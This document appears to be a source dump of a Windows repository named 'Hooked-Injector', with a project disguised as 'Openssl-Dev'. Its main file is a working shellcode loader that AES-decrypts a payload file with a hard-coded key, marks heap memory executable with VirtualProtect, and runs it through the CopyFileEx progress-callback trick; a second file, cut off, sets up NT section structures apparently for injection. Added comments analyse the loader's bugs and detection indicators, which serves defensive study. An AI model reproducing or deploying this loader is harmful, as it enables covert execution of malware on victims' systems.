├── Openssl-Dev
├── holyshit
├── terminator2.raw.ramon
├── Openssl-Dev.rc
├── resource.h
├── Openssl-Dev.vcxproj.filters
├── Sourcefuncional.cpp
├── Openssl-Dev.vcxproj
└── Source.cpp
├── kaka.raw
├── Openssl-Dev.exe
├── kaka.raw.ramon
├── payload.raw.ramon
├── Hooked-Injector.7z
├── terminator.raw.ramon
├── CppProperties.json
├── Openssl-Dev.sln
├── .gitattributes
└── .gitignore
/Openssl-Dev/holyshit:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Openssl-Dev/terminator2.raw.ramon:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/kaka.raw:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/kaka.raw
--------------------------------------------------------------------------------
/Openssl-Dev.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/Openssl-Dev.exe
--------------------------------------------------------------------------------
/kaka.raw.ramon:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/kaka.raw.ramon
--------------------------------------------------------------------------------
/payload.raw.ramon:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/payload.raw.ramon
--------------------------------------------------------------------------------
/Hooked-Injector.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/Hooked-Injector.7z
--------------------------------------------------------------------------------
/terminator.raw.ramon:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/terminator.raw.ramon
--------------------------------------------------------------------------------
/Openssl-Dev/Openssl-Dev.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/Openssl-Dev/Openssl-Dev.rc
--------------------------------------------------------------------------------
/CppProperties.json:
--------------------------------------------------------------------------------
1 | {
2 | "configurations": [
3 | {
4 | "inheritEnvironments": [
5 | "msvc_x64"
6 | ],
7 | "name": "x64-Release",
8 | "includePath": [
9 | "${env.INCLUDE}",
10 | "${workspaceRoot}\\**"
11 | ],
12 | "defines": [
13 | "WIN32",
14 | "NDEBUG",
15 | "UNICODE",
16 | "_UNICODE"
17 | ],
18 | "intelliSenseMode": "windows-msvc-x64"
19 | }
20 | ]
21 | }
--------------------------------------------------------------------------------
/Openssl-Dev/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Openssl-Dev.rc
4 | //
5 | #define IDR_HTML1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/Openssl-Dev/Openssl-Dev.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Archivos de origen
20 |
21 |
22 |
23 |
24 | Archivos de encabezado
25 |
26 |
27 |
28 |
29 | Archivos de recursos
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/Openssl-Dev.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29519.87
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Openssl-Dev", "Openssl-Dev\Openssl-Dev.vcxproj", "{CAD458F3-22A8-4679-AB61-2569DA5FF6EF}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Debug|x64.ActiveCfg = Debug|x64
17 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Debug|x64.Build.0 = Debug|x64
18 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Debug|x86.ActiveCfg = Debug|Win32
19 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Debug|x86.Build.0 = Debug|Win32
20 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Release|x64.ActiveCfg = Release|x64
21 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Release|x64.Build.0 = Release|x64
22 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Release|x86.ActiveCfg = Release|Win32
23 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {243E9A30-A216-4FCF-8C4E-6B55B329AC50}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is needed for earlier builds of msysgit that do not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/Openssl-Dev/Sourcefuncional.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #include
3 |
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 |
10 |
11 | #pragma comment(lib, "advapi32.lib")
12 | #pragma comment(lib, "crypt32.lib")
13 |
14 |
15 |
16 | using namespace std;
17 |
18 |
// Suffix appended to the input name when the (commented-out) encrypt-to-disk
// path builds its output filename; the payload files in this repository carry it.
const char* extension = ".ramon";
// CALG_AES_128 -> 16-byte key / 16-byte block. CHUNK_SIZE (80) is the read and
// transform granularity; it is a multiple of the block size, which every
// non-final CBC chunk has to be.
#define AES_KEY_SIZE 16
#define CHUNK_SIZE (AES_KEY_SIZE*5)
/*
 * encrypter_111 - read the file at `path` and push it through AES-128 via
 * CryptoAPI, 80 bytes at a time, returning the transformed bytes in a
 * malloc'd buffer the caller owns.
 *
 * path       input file. Rejected (returns 0) if longer than MAX_PATH.
 * isDecrypt  TRUE -> CryptDecrypt, FALSE -> CryptEncrypt. Despite the name,
 *            nothing is written to disk in either mode: the hOutFile /
 *            WriteFile code is commented out below, so filename2 is built
 *            and never used.
 * bytes      out-param set to GetFileSize() of the input, i.e. the INPUT
 *            length, not the output length. On decrypt the final block loses
 *            its padding, so the tail of the returned buffer (up to 15 bytes)
 *            is uninitialised heap; on encrypt the output is longer.
 * calculate  TRUE -> only report the size through *bytes and return 0.
 *
 * Returns the buffer, or 0 on any failure. A CryptDecrypt/CryptEncrypt failure
 * inside the read loop only `break`s, so a half-transformed buffer is returned
 * with no error signal to the caller.
 *
 * Resource handling, as written:
 *  - The early returns after CryptCreateHash / CryptHashData / CryptDeriveKey
 *    (and after a failed malloc) leak hInpFile, hProv and hHash.
 *  - The CryptAcquireContextW failure path calls CryptReleaseContext on an
 *    hProv that was never assigned.
 *  - On the happy path hProv is released before hKey/hHash are destroyed;
 *    the documented order is key and hash first, then the provider.
 *  - filename2 is 260+6 bytes, so a `path` of exactly MAX_PATH characters
 *    leaves no room for the terminator and strcat_s rejects it (only
 *    reachable in encrypt mode, which this build never uses).
 *
 * Crypto notes (for anyone analysing the .ramon blobs):
 *  - Key material is hard-coded. CryptDeriveKey(CALG_AES_128) is fed a
 *    SHA-256 hash of the key string, but `len` is the wide-char count from
 *    lstrlenW while CryptHashData takes a byte count, so only the first 15
 *    bytes of the 30-byte UTF-16 string are hashed. Anyone holding this
 *    source can decrypt the payloads shipped alongside it.
 *  - Encrypt mode: CryptEncrypt is told the buffer holds chunk_size (80)
 *    bytes, so a full final chunk has no room for padding and the call fails;
 *    a partial final chunk grows by up to 16 bytes while the output buffer is
 *    only inputSize+1 bytes, so the memcpy at 80*i can write past its end.
 *  - The 80*i destination offset assumes every non-final ReadFile returned a
 *    full 80-byte chunk; the code never tracks the bytes actually produced.
 */
char * encrypter_111(const char* path, BOOL isDecrypt, LPDWORD bytes, BOOL calculate) //std::string data)
{
if (strlen(path) > MAX_PATH)
return 0;
char filename[266];
char filename2[260 + 6];
if (!isDecrypt)
{
// Encrypt mode: output name = input name + ".ramon" (never opened, see below).
strcpy_s(filename, 266, path);
strcpy_s(filename2, 266, path);
strcat_s(filename2, 266, extension);

}
else
{
strcpy_s(filename, 266, path);
}


// Hard-coded key string; `len` is a CHARACTER count (see header note).
wchar_t default_key[] = L"7fwivcli7r#auzS";
wchar_t* key_str = default_key;

size_t len = lstrlenW(key_str);


HANDLE hInpFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL);
if (hInpFile == INVALID_HANDLE_VALUE) {
printf("Cannot open input file!\n");
system("pause");
return 0;
}

/*HANDLE hOutFile = CreateFileA(filename2, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hOutFile == INVALID_HANDLE_VALUE) {
printf("Cannot open output file!\n");
system("pause");
return 0;
}*/



DWORD dwStatus = 0;
BOOL bResult = FALSE;
wchar_t info[] = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
HCRYPTPROV hProv;
BYTE pbBuffer[32]; // unused

// CRYPT_VERIFYCONTEXT: ephemeral provider handle, no persistent key container.
if (!CryptAcquireContextW(&hProv, NULL, info, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
dwStatus = GetLastError();
printf("CryptAcquireContext failed: %x\n", dwStatus);
CryptReleaseContext(hProv, 0); // hProv was never set on this path
system("pause");
return 0; // hInpFile leaks
}



HCRYPTHASH hHash;
if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
dwStatus = GetLastError();
printf("CryptCreateHash failed: %x\n", dwStatus);
CryptReleaseContext(hProv, 0);
system("pause");
return 0; // hInpFile leaks
}

// Byte count = `len` (15), i.e. half of the UTF-16 key string.
if (!CryptHashData(hHash, (BYTE*)key_str, len, 0)) {
DWORD err = GetLastError();
printf("CryptHashData Failed : %#x\n", err);
system("pause");
return 0; // hInpFile, hProv, hHash leak
}

HCRYPTKEY hKey;
if (!CryptDeriveKey(hProv, CALG_AES_128, hHash, 0, &hKey)) {
dwStatus = GetLastError();
printf("CryptDeriveKey failed: %x\n", dwStatus);
CryptReleaseContext(hProv, 0);
system("pause");
return 0; // hInpFile, hHash leak
}


const size_t chunk_size = CHUNK_SIZE;
BYTE chunk[chunk_size] = { 0 };
DWORD out_len = 0;

BOOL isFinal = FALSE;
DWORD readTotalSize = 0;
DWORD inputSize = GetFileSize(hInpFile, NULL);
*bytes = inputSize;
// Size-only query: report the input length, tear everything down, return 0.
if (calculate == TRUE)
{

CryptReleaseContext(hProv, 0);
CryptDestroyKey(hKey);
CryptDestroyHash(hHash);
//memset(random, '\0', 16);
CloseHandle(hInpFile);
/*if (!isDecrypt)
CloseHandle(hOutFile);*/
return 0;
}

// Output buffer sized to the INPUT length (+1). See header for the
// encrypt-mode overflow and the uninitialised tail in decrypt mode.
char* kaka = (char*)malloc(inputSize+1);
if (!kaka)
return 0; // hInpFile, hProv, hHash, hKey leak
int i = 0;
while (bResult = ReadFile(hInpFile, chunk, chunk_size, &out_len, NULL)) {
if (0 == out_len) {
break;
}
readTotalSize += out_len;
// Final chunk: lets CryptoAPI strip (decrypt) or add (encrypt) the padding.
if (readTotalSize == inputSize) {
isFinal = TRUE;
}

if (isDecrypt) {
if (!CryptDecrypt(hKey, NULL, isFinal, 0, chunk, &out_len)) {
printf("[-] CryptDecrypt failed error: 0x%x\n", GetLastError());
break; // falls through to `return kaka` with a partial buffer
}
}
else {
// dwBufLen == chunk_size leaves no room for padding on a full final chunk.
if (!CryptEncrypt(hKey, NULL, isFinal, 0, chunk, &out_len, chunk_size)) {
printf("[-] CryptEncrypt failed\n");
break;
}
}
DWORD written = 0; // only used by the commented-out WriteFile path

// Destination offset assumes each previous chunk produced exactly 80 bytes.
if (i != 0)
memcpy(kaka + 80*i, chunk, out_len);
else
{
memcpy(kaka, chunk, out_len);

}
i++;

/*if (!isDecrypt)
{
if (!WriteFile(hOutFile, chunk, out_len, &written, NULL)) {
printf("writing failed!\n");
break;
}
}*/
// Plain memset before the next read; not a guaranteed secret wipe.
memset(chunk, 0, chunk_size);
}
*bytes = inputSize;
// Provider released before the objects derived from it are destroyed.
CryptReleaseContext(hProv, 0);
CryptDestroyKey(hKey);
CryptDestroyHash(hHash);
//memset(random, '\0', 16);
CloseHandle(hInpFile);
/*if (!isDecrypt)
CloseHandle(hOutFile);
if (isDecrypt == FALSE)
{
HANDLE hInpFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_FLAG_SEQUENTIAL_SCAN, NULL);
CloseHandle(hInpFile);
}*/


return kaka;





}
195 |
196 |
197 |
198 |
199 |
/*
 * Entry point: decrypts terminator.raw.ramon in memory, makes the buffer
 * executable and hands it to CopyFileEx as the progress callback.
 *
 * Flow, as written:
 *  1. encrypter_111(..., calculate=TRUE) only fills `size` with the file's
 *     on-disk length.
 *  2. The second call returns a malloc'd buffer of decrypted bytes, which is
 *     memcpy'd into a second malloc'd buffer `lloc`. Neither malloc nor the
 *     returned pointer is NULL-checked, and the first buffer is never freed.
 *     `size` is the ciphertext length, so the copy also carries the
 *     uninitialised tail left behind when the final block's padding is
 *     stripped.
 *  3. VirtualProtect marks the range holding `lloc` PAGE_EXECUTE_READWRITE.
 *     `lloc` is a heap pointer, not page-aligned, so the protection change
 *     applies to the whole pages the range touches, including neighbouring
 *     heap data.
 *  4. CopyFileEx is called with the same path as source and destination and
 *     `lloc` cast to LPPROGRESS_ROUTINE. The intent is for kernel32 to call
 *     the decrypted buffer as the progress routine; whether the callback
 *     fires before a same-file copy is rejected cannot be confirmed from
 *     this source alone.
 *
 * Detection-relevant for defenders: a VirtualProtect to RWX on a heap range
 * followed by CopyFileEx whose callback pointer lies outside any loaded
 * image, and a ".ramon" payload file next to the executable decryptable
 * with the key hard-coded in encrypter_111.
 *
 * `size`, `fold`, `old` and `dold` are DWORDs initialised with NULL (a
 * pointer constant); it compiles on this toolchain but is the wrong literal.
 * `fold` and `old` are unused.
 */
int main() {

static DWORD size = NULL;
encrypter_111("terminator.raw.ramon", true, &size, true);
char* lloc = (char*)malloc(size);
// Return value unchecked; a 0 here means memcpy from NULL.
memcpy(lloc, encrypter_111("terminator.raw.ramon", true, &size, false), size);
DWORD fold = NULL, old = NULL;





DWORD dold=NULL;

// Heap pages -> RWX. Silent exit on failure.
if (!VirtualProtect(lloc, size, PAGE_EXECUTE_READWRITE, &dold))
return 0;

// The decrypted buffer is passed as the progress callback.
if (!CopyFileEx("terminator.raw.ramon", "terminator.raw.ramon", (LPPROGRESS_ROUTINE)lloc, NULL, FALSE, 0))
printf("Error: %d\n", GetLastError());





}
--------------------------------------------------------------------------------
/Openssl-Dev/Openssl-Dev.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}
24 | OpensslDev
25 | 10.0
26 |
27 |
28 |
29 | Application
30 | true
31 | v142
32 | MultiByte
33 | false
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | MultiByte
41 |
42 |
43 | Application
44 | true
45 | v142
46 | MultiByte
47 | false
48 |
49 |
50 | Application
51 | false
52 | v142
53 | true
54 | MultiByte
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | C:\Program Files\OpenSSL-Win64\include;$(IncludePath)
76 |
77 |
78 | C:\Program Files\OpenSSL-Win64\;$(ExecutablePath)
79 | C:\Program Files\OpenSSL-Win64\include;$(IncludePath)
80 |
81 |
82 |
83 | Level3
84 | Disabled
85 | true
86 | true
87 |
88 |
89 | Console
90 |
91 |
92 |
93 |
94 | Level3
95 | Disabled
96 | true
97 | true
98 | MultiThreadedDebug
99 |
100 |
101 | Console
102 |
103 |
104 |
105 |
106 | Level3
107 | MaxSpeed
108 | true
109 | true
110 | true
111 | true
112 | true
113 |
114 |
115 | Console
116 | true
117 | true
118 |
119 |
120 |
121 |
122 | Level3
123 | MaxSpeed
124 | true
125 | true
126 | true
127 | true
128 | false
129 | /MT %(AdditionalOptions)
130 |
131 |
132 | Console
133 | true
134 | true
135 | false
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------
/Openssl-Dev/Source.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #define _MT
3 | #include
4 |
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 |
15 | #pragma comment(lib,"ntdll.lib")
16 | #pragma comment(lib, "advapi32.lib")
17 | #pragma comment(lib, "crypt32.lib")
18 |
19 | #ifndef NT_SUCCESS
20 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
21 | #endif
22 |
23 | using namespace std;
24 |
25 |
// Suffix appended to the input name when crypter() names its output file;
// the payload files in this repository carry it.
const char* extension = ".ramon";
// CALG_AES_128 -> 16-byte key / 16-byte block. CHUNK_SIZE (80) is the read
// and transform granularity; a multiple of the block size, as every
// non-final CBC chunk has to be.
#define AES_KEY_SIZE 16
#define CHUNK_SIZE (AES_KEY_SIZE*5)
// Not written or read by any code visible in this view (crypter() below is
// cut off); presumably a payload location/size for a later stage -- TODO confirm.
void* offset;
size_t size_offset;
31 |
// Output layout for NtQuerySection(SectionBasicInformation).
// Not referenced by any code visible in this view.
typedef struct _SECTION_BASIC_INFORMATION {
PVOID Base;
ULONG Attributes;
LARGE_INTEGER Size;
} SECTION_BASIC_INFORMATION, * PSECTION_BASIC_INFORMATION;
37 |
38 | // http://undocumented.ntinternals.net/source/usermode/structures/section_image_information.html
// Output layout for NtQuerySection(SectionImageInformation), copied from the
